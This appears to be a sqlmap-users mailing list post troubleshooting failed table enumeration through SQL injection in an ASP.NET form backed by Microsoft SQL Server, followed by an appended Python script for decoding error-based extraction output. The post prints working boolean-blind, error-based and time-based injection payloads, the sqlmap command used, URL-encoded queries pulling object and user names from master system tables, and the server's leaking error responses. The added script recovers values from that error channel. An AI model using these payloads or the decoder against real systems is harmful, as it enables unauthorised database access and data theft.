SQLmap is able to extract db names, current user and backend info, but when I try to get tables I end up with junk data or nothing at all. I find this strange because SQLmap has identified multiple injection methods and I am on a fast local connection with the target server. This is the log file with examples of good/bad data.
sqlmap identified the following injection points with a total of 118915 HTTP(s) requests:
---
Place: POST
Parameter: accountNumber
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111 ELSE 1/(SELECT 0) END))&meterNumber=1111111&zipCode=78451&email=t...@test.com&register=Register

    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email=t...@test.com&register=Register

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&meterNumber=1111111&zipCode=78451&email=t...@test.com&register=Register
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [21]:
[redacted]
current user: [redacted]
current database: [redacted]
current user is DBA: False
[6 tables]
+------------------------------------------------------------------------------------------------------------------------
| dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2 |
| dbo.[\n\n] |
| dbo.[\n\n] |
| dbo.[\n\n] |
| dbo.[\n\n] |
+------------------------------------------------------------------------------------------------------------------------

When I use the --no-cast and --hex flags I get no data at all, and when I don't use them I get junk data.
When I look at the raw request/response, in every case I see sqlmap send a test request with no injection, which generates a 200 response; then follows an attempt to read the number of tables, which generates a 500 error with a number in the error message. Every follow-on request generates a 200 OK response, which means that neither boolean- nor error-based methods are working and it falls back to time-based, which then also fails. All of the correct data gathered so far came through error messages. However, specifying --technique=E --parse-errors does not gain any additional info. Some selected examples from the logs related to this attempt follow:

./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D master --tables -t ~/sqlmap

[WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[CRITICAL] unable to retrieve the tables for any database
[WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 18 times

%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29

HTTP response [#2] (500 Internal Server Error):
[Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value ':omd:0x00000167:dog:' to data type int.

%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29

HTTP response [#3] (200 OK):

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
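Added example (not from the post and not sqlmap's own code) showing what the two logged responses carry in the error-based channel, so they can be compared side by side. It assumes the ':omd:' / ':dog:' delimiters spelled out by the CHAR() sequences in the post's payload, and decodes the fn_varbintohexstr() hex between them: CAST(COUNT(...) AS VARBINARY) yields a 4-byte big-endian INT (response #2 carries 0x00000167), while a sysname (nvarchar) cast to VARBINARY yields UTF-16LE bytes; both response bodies below are constructed, modelled on the post.

```python
import re
from typing import Optional, Union

# Constructed response bodies, modelled on responses #2 and #3 in the post.
RESPONSE_500 = ("[Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when "
                "converting the nvarchar value ':omd:0x00000167:dog:' to data type int.")
RESPONSE_200 = "<html><body>Register</body></html>"  # plain page: no error text at all

# CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58) = ':omd:' (prefix) and
# CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58) = ':dog:' (suffix) in the payload.
MARKER_RE = re.compile(r":omd:(?P<val>[^:]*):dog:")


def extract_marker(body: str) -> Optional[str]:
    """Return the text wrapped by the delimiters, or None when the response
    carried no conversion error (the 200 OK case in the post)."""
    m = MARKER_RE.search(body)
    return m.group("val") if m else None


def decode_hex_value(val: str, kind: str) -> Union[int, str]:
    """Decode fn_varbintohexstr() output ('0x' followed by hex pairs).
    kind='count': VARBINARY form of an INT, 4 bytes big-endian.
    kind='name':  nvarchar cast to VARBINARY, i.e. UTF-16LE bytes."""
    if not val.startswith("0x") or len(val) % 2 != 0:
        raise ValueError(f"not a well-formed hex string: {val!r}")
    raw = bytes.fromhex(val[2:])
    if kind == "count":
        return int.from_bytes(raw, "big", signed=True)
    if kind == "name":
        return raw.decode("utf-16-le")
    raise ValueError(f"unknown kind: {kind!r}")


def recover(body: str, kind: str) -> Optional[Union[int, str]]:
    """Full path: find the marker in a response body and decode it; None
    means the error-based channel produced nothing for that request."""
    val = extract_marker(body)
    return None if val is None else decode_hex_value(val, kind)


if __name__ == "__main__":
    print("response #2 count:", recover(RESPONSE_500, "count"))  # 359
    print("response #3 name: ", recover(RESPONSE_200, "name"))   # None
```

Run against the post's two responses, the count request decodes to 359 entries while the table-name request yields nothing, which is exactly the point at which sqlmap loses the error-based channel.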